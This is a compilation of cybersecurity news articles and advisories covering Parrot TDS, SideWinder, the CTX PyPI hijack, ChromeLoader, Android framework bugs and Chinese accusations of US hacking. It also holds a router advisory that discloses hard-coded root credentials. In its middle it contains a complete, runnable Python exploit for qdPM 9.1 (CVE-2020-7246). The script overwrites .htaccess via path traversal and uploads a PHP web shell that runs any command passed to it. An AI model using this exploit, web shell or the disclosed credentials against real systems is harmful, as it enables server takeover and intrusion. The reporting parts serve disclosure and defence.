The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research.
Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites.
Parrot TDS was documented in

The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research.

Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites.

Parrot TDS was documented in April 2022 by Czech cybersecurity company Avast, noting that the PHP script had ensnared web servers hosting more than 16,500 websites to act as a gateway for further attack campaigns.

This involves appending a piece of malicious code to all JavaScript files on compromised web servers hosting content management systems (CMS) such as WordPress that are in turn said to be breached by taking advantage of weak login credentials and vulnerable plugins.

Besides using different obfuscation tactics to conceal the code, the "injected JavaScript may also be found well indented so that it looks less suspicious to a casual observer," Sucuri researcher Denis Sinegubko said.

JavaScript variant using the ndsj variable

The goal of the JavaScript code is to kick-start the second phase of the attack, which is to execute a PHP script that's already deployed on the ever and is designed to gather information about a site visitor (e.g., IP address, referrer, browser, etc.) and transmit the details to a remote server.

Typical obfuscated PHP malware found in NDSW campaign

The third layer of the attack arrives in the form of a JavaScript code from the server, which acts as a traffic direction system to decide the exact payload to deliver for a specific user based on the information shared in the previous step.

"Once the TDS has verified the eligibility of a specific site visitor, the NDSX script loads the final payload from a third-party website," Sinegubko said. The most commonly used third-stage malware is a JavaScript downloader named FakeUpdates (aka SocGholish).

In 2021 alone, Sucuri said it removed Parrot TDS from nearly 20 million JavaScript files found on infected sites. In the first five months of 2022, over 2,900 PHP and 1.64 million JavaScript files have been observed containing the malware.

"The NDSW malware campaign is extremely successful because it uses a versatile exploitation toolkit that constantly adds new disclosed and 0-day vulnerabilities," Sinegubko explained.

"Once the bad actor has gained unauthorized access to the environment, they add various backdoors and CMS admin users to maintain access to the compromised website long after the original vulnerability is closed."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network

USR IOT 4G LTE Industrial Cellular VPN Router v1.0.36 was discovered to contain hard-coded credentials for its highest privileged account. The credentials cannot be altered through normal operation of the device.

Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor  
Advisory ID: ZSL-2022-5705  
Type: Local/Remote  
Impact: Exposure of Sensitive Information, Security Bypass, System Access, DoS  
Risk: (5/5)  
Release Date: 20.04.2022

**Summary**

USR-G806 is a industrial 4G wireless LTE router which provides a solution for users to connect own device to 4G network via WiFi interface or Ethernet interface. USR-G806 adopts high performance embedded CPU which can support 580MHz working frequency and can be widely used in Smart Grid, Smart Home, public bus and Vending machine for data transmission at high speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG, flow control and has many advantages including high reliability, simple operation, reasonable price. USR-G806 supports WAN interface, LAN interface, WLAN interface, 4G interface. USR-G806 provides various networking mode to help user establish own network.

**Description**

The USR IOT industrial router is vulnerable to hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the device. The 'usr' account with password 'www.usr.cn' has the highest privileges on the device. The password is also the default WLAN password.

**Vendor**

Jinan USR IOT Technology Limited - https://www.pusr.com

**Affected Version**

1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)  
1.2.7 (USR-LG220-L)

**Tested On**

GNU/Linux 3.10.14 (mips)  
OpenWrt/Linaro GCC 4.8-2014.04  
Ralink SoC MT7628 PCIe RC mode  
BusyBox v1.22.1  
uhttpd  
Lua

**Vendor Status**

\[10.04.2022\] Vulnerability discovered.  
\[14.04.2022\] Vendor contacted.  
\[19.04.2022\] No response from the vendor.  
\[20.04.2022\] Public security advisory released.

**PoC**

usriot\_root.py

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://packetstormsecurity.com/files/166813/  
\[2\] https://cxsecurity.com/issue/WLB-2022040086  
\[3\] https://exchange.xforce.ibmcloud.com/vulnerabilities/224930  
\[4\] https://www.exploit-db.com/exploits/50894  
\[5\] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29730  
\[6\] https://nvd.nist.gov/vuln/detail/CVE-2022-29730

**Changelog**

\[20.04.2022\] - Initial release  
\[03.05.2022\] - Added reference \[1\], \[2\] and \[3\]  
\[13.05.2022\] - Added reference \[4\]  
\[29.05.2022\] - Added reference \[5\] and \[6\]

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CVE-2022-29730: Zero Science Lab » USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor

Speaking at WithSecure’s annual conference, Mikko Hyppönen discussed the threat landscape between the two nations

Speaking at WithSecure’s annual conference, Mikko Hyppönen discussed the threat landscape between the two nations

Russia is failing in its mission to shake Ukraine’s cyber resilience as the country continues to successfully thwart cyber-attacks from its oppressor.

That was the takeaway from WithSecure’s Sphere conference this week, as chief research officer Mikko Hyppönen told attendees that Putin’s regime is “largely failing”.

During the event, held in Helsinki, Finland, Mikko shared insight into the conflict between the two countries, which has now been ongoing for more than three months.

Read more of the latest security news from the Ukraine conflict

Since even before its invasion of Ukraine began on February 24, 2022, Russia has conducted a series of cyber-attacks against both the country’s internet infrastructure and other critical services in an attempt to destabilize Ukraine.

Reports of cyber activity between the two states have dwindled somewhat in recent months, Hyppönen told attendees, but not due to a lack of such attacks.

Instead, says Hyppönen, the decrease in media attention is because Ukraine is successfully thwarting Russia’s cyber assaults. After all, he says, the attacks that were not successful rarely make the news.

Hyppönen said: “They’ve been trying to do things like this over and over again, so the lack of activity in offensive cyberspace that we’ve seen over the last few months is not because Russia isn’t trying – they are trying – but we aren’t seeing more activity because Ukraine is defending \[successfully\].

BACKGROUND Microsoft report unmasks at least six Russian nation-state actors responsible for cyber-attacks against Ukraine

“Ukraine has been able to defend itself both in the real world but also in the online world. In fact, I’ll claim that Ukraine is the best country in Europe to defend its networks against governmental attacks from Russia.

“Why is that? Well, it’s because they’ve been doing it for eight years. They’ve been doing it for real, over and over again.”

**‘Russia is failing’**

According to Hyppönen, Ukraine is currently experiencing three times more attacks as it was this time last year.

“Russia is trying, but it is largely failing,” he said.

His comments come as German financial regulator BaFin warned this week (May 31) that European financial markets should be on high alert following a recent increase in cyber-attacks.

In a security notice, BaFin said that a number of distributed denial-of-service (DDoS) attacks had targeted German banks and financial services.

BaFin believes that these attacks originate from Russia, which continues to suffer economic sanctions following its invasion of Ukraine.

READ MORE Ukrainian ISP used by military disrupted by ‘powerful’ cyber-attack

It’s not just Europe that is feeling the effects of this war. US military leaders confirmed to Sky News yesterday (June 1) that it has conducted “a series of operations across the full spectrum; offensive, defensive, \[and\] information operations”.

US-based Microsoft is also, Hyppönen says, for “the first time in history is taking an active stance against the war”.

Microsoft is indeed actively disrupting attacks from Russia targeting Ukraine, notably from Russian hacking group Strontium, which the company claims is a Russian GRU-connected actor it has “tracked for years”.

Hyppönen ended his talk by encouraging greater collaboration.

“Taking a stand here is really simple, it’s really obvious. I think we all choose to stand with Ukraine. We choose to stand with democracy, and we choose to stand against evil.

“During this war, we’ve again and again seen the images from the battlefield, we’ve seen Russian tanks and trucks carry the Z symbol.

“On your computer keyboard, Ctrl+Z means undo. So what we should be doing right now is to Ctrl+Z.”

YOU MAY ALSO LIKE Government agencies in Ukraine targeted in cyber-attacks deploying MicroBackdoor malware

Insight: Russia is ‘failing’ in its mission to destabilize Ukraine’s networks after a series of thwarted cyber-attacks

An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020.
"Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their

An "aggressive" advanced persistent threat (APT) group known as **SideWinder** has been linked to over 1,000 new attacks since April 2020.

"Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations," cybersecurity firm Kaspersky said in a report that was presented at Black Hat Asia this month.

SideWinder, also called Rattlesnake or T-APT-04, is said to have been active since at least 2012 with a track record of targeting military, defense, aviation, IT companies, and legal firms in Central Asian countries such as Afghanistan, Bangladesh, Nepal, and Pakistan.

Kaspersky's APT trends report for Q1 2022 published late last month revealed that the threat actor is actively expanding the geography of its targets beyond its victim profile to other countries and regions, including Singapore.

SideWinder has also been observed capitalizing the ongoing Russo-Ukrainian war as a lure in its phishing campaigns to distribute malware and steal sensitive information.

The adversarial collective's infection chains are notable for incorporating malware-rigged documents that take advantage of a remote code vulnerability in the Equation Editor component of Microsoft Office (CVE-2017-11882) to deploy malicious payloads on compromised systems.

Furthermore, SideWinder's toolset employs several sophisticated obfuscation routines, encryption with unique keys for each malicious file, multi-layer malware, and splitting command-and-control (C2) infrastructure strings into different malware components.

The three-stage infection sequence commences with the rogue documents dropping a HTML Application (HTA) payload, which subsequently loads a .NET-based module to install a second-stage HTA component that's designed to deploy a .NET-based installer.

This installer, in the next phase, is both responsible for establishing persistence on the host and loading the final backdoor in memory. The implant, for its part, is capable of harvesting files of interest as well as system information, among others.

No fewer than 400 domains and subdomains have been put to use by the threat actor over the past two years. To add an additional layer of stealth, the URLs used for C2 domains are sliced into two parts, the first portion of which is included in the .NET installer and the latter half is encrypted inside the second stage HTA module.

"This threat actor has a relatively high level of sophistication using various infection vectors and advanced attack techniques," Noushin Shabab of Kaspersky said, urging that organizations use up-to-date versions of Microsoft Office to mitigate such attacks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

SideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years

To minimize the impact of cyber incidents, organizations must be pragmatic and develop a strategy of resilience for dealing with break-ins, advanced malware, and data theft.

The frequency and severity of cyber threats are escalating and will continue to get stronger as cybercriminals pivot from one target to the next to maximize profit potential. Sooner or later, an attack will be successful. This presents a huge risk for businesses that lack sufficient cyber-resiliency preparation to stop the spread and recover quickly.

Cybercriminals are becoming experts in deception, which makes them increasingly difficult to detect. When they infiltrate an organization’s system, the door remains open for them to recode and encrypt a business's data. Once this happens, cybercriminals gain control (of data and systems) and can hold a business's information for ransom.

In addition to the ransom cost, additional costs are incurred following a ransom attack. Of those companies falling victim, 74% report business disruption lasting more than a day, with 28% taking a week or longer to recover from a ransom attack. For many, especially small and midsize companies, the financial and reputational repercussions of recovering from the occurrence can be devastating.

**Cyber-Resilience Framework**

To minimize the impact of cyber incidents, organizations must become pragmatic and develop a cyber-resilience strategy for dealing with the ramifications of cyber incidents. While reducing cyber-risk doesn’t guarantee there will never be a creaky backdoor for cybercriminals to slip in, it decreases the opportunities for attack and can accelerate an organization's recovery rate.

A cyber-resilience framework must include numerous elements of prevention and the ability to recover (if an attack is successful). There are six steps organizations can leverage when creating a multipronged cyber framework to achieve cyber resiliency.

**1\. Identify**

Organizations cannot protect what they have not identified. IT teams must regularly scan the organization's entire IT footprint including endpoints, servers, and cloud applications. This ensures assets as well as potential vulnerabilities are identified before cybercriminals can exploit them.

**2\. Protect**

With the hybrid work model here to stay, employees' remote devices are often the first target for cybercriminals. To mitigate this risk, organizations must ensure employee devices have endpoint protection solutions enabled to ensure cyber intrusions are automatically blocked while still allowing their work routines to be left undisturbed.

**3\. Detect**

While prevention is key to reducing cyber-risks, one thing can be said about cybercriminals: They are persistent. If they meet a closed door, they will try another. Threat intelligence and experience-based detection are essential to prevent a cyberattack attempt from evolving into a major cybersecurity breach.

**4\. Respond**

If a threat is detected in the third step, organizations can find themselves in a harmful spot when considering business continuity. To lessen the impact of a cyber breach, organizations should have a predefined playbook in times of crisis. This step can reduce the period of panic and allow for IT teams and the entire organization to act timely and efficiently when a breach is detected.

**5\. Recover**

In many cases, a cybercriminal will create their own backdoor as they infiltrate an organization's system. This allows cybercriminals to return and continue to collect the information needed to hold a business for ransom. To enable an easy return, organizations need to back up critical servers and endpoints. This allows organizations to recover damaged devices and use their backup file recovery as a lifeline.

**6\. Educate**

This step comes back to cyber protection being only as strong as each remote employee. Cyber awareness is essential when establishing cyber resilience so IT teams need to take the time to educate employees about cybercrime tactics such as phishing and business email compromise. By consistently implementing periodic, easy-to-understand awareness and response training, organizations are one step closer to ensuring cyber resilience and mitigating human risk.

**From Framework to Action**

Unless implemented, a framework is just a blueprint. Organizations must convert a cyber-resilience plan into their cybersecurity infrastructure to ensure effectiveness. Furthermore, leveraging a cyber-resilience framework can act as a confidence assessment guide. Business leaders and IT teams alike must revaluate their action plans to achieve practical cyber-prevention methods for the next time cybercriminals knock at the backdoor.

6 Steps to Ensure Cyber Resilience

Four high severity vulnerabilities have been disclosed in a framework used by pre-installed Android System apps with millions of downloads.
The issues, now fixed by its Israeli developer MCE Systems, could have potentially allowed threat actors to stage remote and local attacks or be abused as vectors to obtain sensitive information by taking advantage of their extensive system privileges.
"As

Four high severity vulnerabilities have been disclosed in a framework used by pre-installed Android System apps with millions of downloads.

The issues, now fixed by its Israeli developer MCE Systems, could have potentially allowed threat actors to stage remote and local attacks or be abused as vectors to obtain sensitive information by taking advantage of their extensive system privileges.

"As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device," the Microsoft 365 Defender Research Team said in a report published Friday.

The weaknesses, which range from command-injection to local privilege escalation, have been assigned the identifiers CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601, with CVSS scores between 7.0 and 8.9.

Command injection proof-of-concept (POC) exploit code

Injecting a similar JavaScript code to the WebView

The vulnerabilities were discovered and reported in September 2021 and there is no evidence that the shortcomings are being exploited in the wild.

Microsoft didn't disclose the complete list of apps that use the vulnerable framework in question, which is designed to offer self-diagnostic mechanisms to identify and fix issues impacting an Android device.

This also meant that the framework had broad access permissions, including that of audio, camera, power, location, sensor data, and storage, to carry out its functions. Coupled with the issues identified in the service, Microsoft said it could permit an attacker to implant persistent backdoors and take over control.

Some of the affected apps are from large international mobile service providers such as Telus, AT&T, Rogers, Freedom Mobile, and Bell Canada -

*   Mobile Klinik Device Checkup (com.telus.checkup)
*   Device Help (com.att.dh)
*   MyRogers (com.fivemobile.myaccount)
*   Freedom Device Care (com.freedom.mlp.uat), and
*   Device Content Transfer (com.ca.bell.contenttransfer)

Additionally, Microsoft is recommending users to look out for the app package "com.mce.mceiotraceagent" — an app that may have been installed by mobile phone repair shops — and remove it from the phones, if found.

The susceptible apps, although pre-installed by the phone providers, are also available on the Google Play Store and are said to have passed the app storefront's automatic safety checks without raising any red flags because the process was not engineered to look out for these issues, something that has since been rectified.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Finds Critical Bugs in Pre-Installed Apps on Millions of Android Devices

They claim that all data received was deleted

They claim that all data received was deleted

A ‘security researcher’ accused of unethical activity through the alleged hijack of a popular open source project insists that their actions were not malicious.

Last week, as previously reported by _The Daily Swig_, social media users alerted the Python Package Index (PyPI) repository to a potentially malicious or hijacked package, CTX.

**BACKGROUND** Malicious Python library CTX removed from PyPI repo

On May 22, Reddit user SocketPuppets promoted the package online, claiming it had received an update after lying dormant for roughly eight years.

The CTX Python library was available on both GitHub and PyPI. However, it wasn’t long before participants on a Reddit thread highlighted that the GitHub package had not been updated at the same time as the PyPI repository.

To make matters worse, the individual responsible also allegedly compromised a different package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.’

**Domain takeover**

With an estimated three million downloads combined, the Python packages had been tampered with to send environmental variables – such as AWS keys – to an external URL leading to a Heroku app.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method had been added after a perpetrator purchased a domain name for the expired email address used by the original developer, sent themselves a recovery password, and took over the account.

Read more of the latest hacking news from around the world

Users who installed the package between May 14 and May 22, 2022, may have had linked environmental variables and credentials compromised.

SocketPuppets (account since deleted) tried to defend their actions, claiming the unusual activity was due to a “new company account”.

The individual accused of the activity, then published a Medium blog post to share their “side of the story”.

“All this research DOES NOT contain any malicious activity,” Aydin said. “I want to show how this simple attack affects +10M users and companies. ALL THE DATA THAT I RECEIVED IS DELETED AND NOT USED.”

**‘Never responsibly disclosed’**

According to Aydin, a ‘scraper tool’ and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he sent a report to the bug bounty platform HackerOne on May 15 that was closed as a duplicate a day later.

Their HackerOne profile does not appear to show an associated bug report.

Speaking to _The Daily Swig_, Sangwan said that the vulnerability “was never responsibly disclosed”, and “this was an actual attack”.

Sangwan added: “After taking over the package, the attacker posted about it on Reddit… and when other users started getting suspicious and I discovered another package they had compromised. The attacker came out and claimed that he did it for ‘research’.

“Replacing a popular software with a backdoored version that steals password\[s\] of people is anything but research.”

**YOU MIGHT ALSO LIKE** Volatile market for stolen credit card data shaken up by sanctions against Russia

Security ‘researcher’ hits back against claims of malicious CTX file uploads

By Waqas
A new malvertising campaign has emerged in which ChromeLoader malware is being used to hijack browsers and steal…
This is a post from HackRead.com Read the original post: ChromeLoader Browser Malware Spreading Via Pirated Games and QR Codes

**A new malvertising campaign has emerged in which ChromeLoader malware is being used to hijack browsers and steal data.**

A sudden, unexpected spike in browser hijacking campaigns utilizing ChromeLoader malware has been detected lately, stated Aedan Russell from Red Canary. Russell noted that the attackers aim to hijack browsers through the “pervasive and persistent” ChromeLoader malware that can modify browser settings and redirect the victim to advertisement sites.

The malvertising campaign is financially motivated as the attackers are part of a wider network of marketing affiliates and redirect the user to advertising sites.

**What is ChromeLoader?**

For your information, ChromeLoader is a Chrome browser extension distributed as ISO files through pay-per-install websites and fraudulent social media posts usually offering QR codes, pirated movies, or cracked video games.

A screenshot of a Tweet shared by researchers shows a redacted scannable malicious QR code that leads to ChromeLoader’s download site

ChromeLoader changes web browser settings to display search results that lure users to download unwanted software, visit dating sites or adult games platforms, and participate in fake surveys. It stands apart among other browser hijackers for its incredible persistence, infection route, and volume involving abuse of PowerShell.

**Attack Scenario**

According to Red Canary’s blog post, the malware operators use a malicious ISO archive file to invade the system. This file is promoted as a cracked executable for commercial software or a video game so that the victims can download it from malicious sites or torrents. Malware operators also use Twitter posts to promote the malicious executable.

When the file is double-clicked by a user in Windows 10 or later systems, it is mounted as a virtual CD-ROM drive. Although it appears to be a keygen or game crack titled CS\_Installer.exe, the executable in this ISO file actually unleashes the malware.

ChromeLoader then executes/decodes a PowerShell command to fetch an archive from the remote resource and gets loaded on the system as a Chrome extension. Afterward, the PowerShell removes the scheduled task and infects Chrome with a discreetly injected extension to hijack and manipulate the browser results.

Red Canary researchers identified that ChromeLoader operators also target macOS systems to manipulate Safari web browser and Chrome. The infection chain is similar on macOS, but attackers use DMG (Apple Disk Image) file instead of ISO.

Furthermore, instead of the executable containing the installer, in macOS, an installer bash script is used to download and decompress the malware extension onto the private/var/tmp directory.

**More Chrome Browser and Malware News**

1.  New Jupyter backdoor malware steals Chrome, Firefox data
2.  New variant of MassLogger Trojan stealing Chrome, Outlook data
3.  Chrome extensions with 80 million+ users found engaging in ad fraud
4.  Malicious Chrome, Edge extensions manipulating Google search results
5.  Malware infected browser extensions stealing Chrome, and Edge user data

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChromeLoader Browser Malware Spreading Via Pirated Games and QR Codes

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

The Chinese government recently began saber-rattling about American cyberespionage. The catch? It’s all old news.

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from pharmaceutical companies to video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown in aggression, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, there has been a marked uptick in China’s Foreign Ministry and the country’s cybersecurity firms calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the Global Times reported on further National Computer Virus Emergency Response Center findings around HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer a secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activity.)

Ben Read, director of cyberespionage analysis at US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. Although a Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cyber theft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues including concerns of telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, vice president of intelligence at US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

Tag

#backdoor